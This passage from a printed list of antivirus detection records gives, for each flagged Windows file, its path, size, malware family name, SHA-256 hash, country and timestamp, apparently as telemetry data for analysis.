  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\goyeegboaoh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='b3be4597b13811782e6c5ebbb6fae31fb801a66d6b2fcee389d6a63bd9af6882', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d45e', filepath='\\\\?\\C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d45e', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d922a3297ae1ebb739432aeeeba1efbc3671d3a1d172ba458618732fd5fef2ef', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\iuivjmdpqfg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp002966d4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002966d4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:25:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292bac', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292bac', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:17:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120956-a4a8e38f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b237c868\\AVSCAN-20181104-114819-1D269D51\\AVSCAN-20181104-120956-A4A8E38F', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='RE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296f21', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296f21', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:37:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\H:\\Microsoft Flight Simulator X\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141612-8fd53a44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-141612-8FD53A44', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:16:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162134-63ff38ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bce52ab\\AVSCAN-20181104-161950-575F36AB\\AVSCAN-20181104-162134-63FF38FF', filesize=3712000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='d4f814c329840441a026338f34f3ea7247fa21c295afc956920a26d89cad6947', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002942a8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002942a8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:37:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023919e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023919e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:36:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D0311C978D131DED69D61D1F141AFC0EB99B6C978C7BFDA575032F5B44603204', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:49:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238b6b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238b6b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:29:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ea576e6f7eaff287a3276b21ec50f510a52e5cc45e9c066ddd0f870f6b5bcd68', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EA576E6F7EAFF287A3276B21EC50F510A52E5CC45E9C066DDD0F870F6B5BCD68', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ea576e6f7eaff287a3276b21ec50f510a52e5cc45e9c066ddd0f870f6b5bcd68', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:35:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195148-df0497dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43e1d34b\\AVSCAN-20181104-194842-C95A47FF\\AVSCAN-20181104-195148-DF0497DD', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='กล้องปุ้ย.exe', filepath='E:\\picture\\กล้องปุ้ย\\กล้องปุ้ย.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='f0a8e9891566739b54cd1b6f3def574f6166830dd10ca844d76704a120dd8104', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:17:14Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='4b52764c2c6f57a583c769ba7b2f7a83649c38fecbe5f80e0b24fc2514c897e4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rome2.dll', filepath='H:\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='1bc1882a15ffcfed8f266998f6b4fb8bdab162d73dfd41a0ae29af57feaebf92', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:59:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-00-43-38.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T18:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T08:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8ee1ae3b9eb955597095fd702bef4fce9f447068', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ee1ae3b9eb955597095fd702bef4fce9f447068', filesize=2112000, name='Adware/DealPly.25a0a4.#M1.#R1'), hash='25a0a400f0303d8f77edadd093db30413123768cb66a957616dafe58f8d9b416', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:12:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155818-e2330183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155818-E2330183', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160019-ef51b41d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160019-EF51B41D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T02:53:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:40:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsiw.exe', filepath='\\\\?\\E:\\Abby Fine Reader\\Setup\\instmsiW.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='6f6501c4387709cc413b1303b54eb5ff1efe764328ec5c2c57a4bdc135470d9b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f9f0bb9d762aa110fc70628dce882cd288b4e5856b8064dd73687952af0b067', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F9F0BB9D762AA110FC70628DCE882CD288B4E5856B8064DD73687952AF0B067', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6f9f0bb9d762aa110fc70628dce882cd288b4e5856b8064dd73687952af0b067', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:17:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installer_flash_winx86_64-32.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_winx86_64-32-master (1).zip\\winx86_64-32-master\\Installer_Flash_winx86_64-32.exe', filesize=640000, name='TR/AD.MoksSteal.B.#M1.#R1'), hash='3ab0dc374a4c881f90e62fcd8065efec4ce4270f623ef3e53ceb7312802f4d94', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:30:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155943-eb6a8571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155943-EB6A8571', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='重置巅峰.exe', filepath='e:\\administrator\\desktop\\重置巅峰.exe', filesize=640000, name='APPL/Agent.2f20e6.#M1.#R1'), hash='2f20e690f38c1b295298cef0898661052e2fd08d0395646469c08390dba3bedf', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T00:57:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sipesat.exe', filepath='D:\\DOKUMENKU\\LAPOR SIPESAT\\SIPESAT.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160153-f9784a0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160153-F9784A0B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T13:26:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134338-90bfc6dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134338-90BFC6DD', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:16Z'), dt=datetime.date(2018, 11, 2)),
